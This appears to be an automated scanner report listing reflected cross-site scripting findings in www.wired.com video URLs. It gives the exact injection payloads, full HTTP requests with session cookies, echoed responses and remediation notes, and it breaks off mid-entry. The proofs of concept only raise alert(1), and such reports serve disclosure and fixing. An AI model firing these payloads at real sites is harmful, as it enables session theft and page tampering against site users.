HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:50 GMT Date: Mon, 22 Nov 2010 00:39:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 85728--><script>alert(1)</script>6bb8ad67c22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:32 GMT Date: Mon, 22 Nov 2010 00:35:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb4f"><a>5e07a67febf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8eb4f"><a>5e07a67febf/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:38:55 GMT Date: Mon, 22 Nov 2010 00:34:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8eb4f"><a>5e07a67febf ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9a0"-alert(1)-"baca53fa180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos3b9a0"-alert(1)-"baca53fa180/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:41:26 GMT Date: Mon, 22 Nov 2010 00:36:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2782"><a>13c785d8e84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videose2782"><a>13c785d8e84/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:40:18 GMT Date: Mon, 22 Nov 2010 00:35:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videose2782"><a>13c785d8e84 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b24ca"-alert(1)-"f6fa933e780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestb24ca"-alert(1)-"f6fa933e780/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:26 GMT Date: Mon, 22 Nov 2010 00:37:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79878"><a>7a4f304f4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest79878"><a>7a4f304f4cf/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest79878"><a>7a4f304f4cf"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92bef"-alert(1)-"83beb12e69a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663392bef"-alert(1)-"83beb12e69a/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:33 GMT Date: Mon, 22 Nov 2010 00:37:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eefd"-alert(1)-"6be03000938 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team7eefd"-alert(1)-"6be03000938/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7386"-alert(1)-"a9f8081c1bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001c7386"-alert(1)-"a9f8081c1bd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:43:05 GMT Date: Mon, 22 Nov 2010 00:38:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e600f--><script>alert(1)</script>f14c661e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:16 GMT Date: Mon, 22 Nov 2010 00:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8743f"><a>96446f44fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8743f"><a>96446f44fa8/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:32 GMT Date: Mon, 22 Nov 2010 00:41:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8743f"><a>96446f44fa8 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdee2"-alert(1)-"8c37db9a46d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosbdee2"-alert(1)-"8c37db9a46d/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:05 GMT Date: Mon, 22 Nov 2010 00:43:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408ee"><a>eb79182c383 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos408ee"><a>eb79182c383/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:17 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos408ee"><a>eb79182c383 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f3"-alert(1)-"4f2d0accdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest6a7f3"-alert(1)-"4f2d0accdf/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:48:46 GMT Date: Mon, 22 Nov 2010 00:44:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106830
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d617"><a>93407c07ac1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest7d617"><a>93407c07ac1/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:09 GMT Date: Mon, 22 Nov 2010 00:43:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest7d617"><a>93407c07ac1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67771"-alert(1)-"6876dab4361 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663367771"-alert(1)-"6876dab4361/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:23 GMT Date: Mon, 22 Nov 2010 00:44:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f2"-alert(1)-"53afbfa2f39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
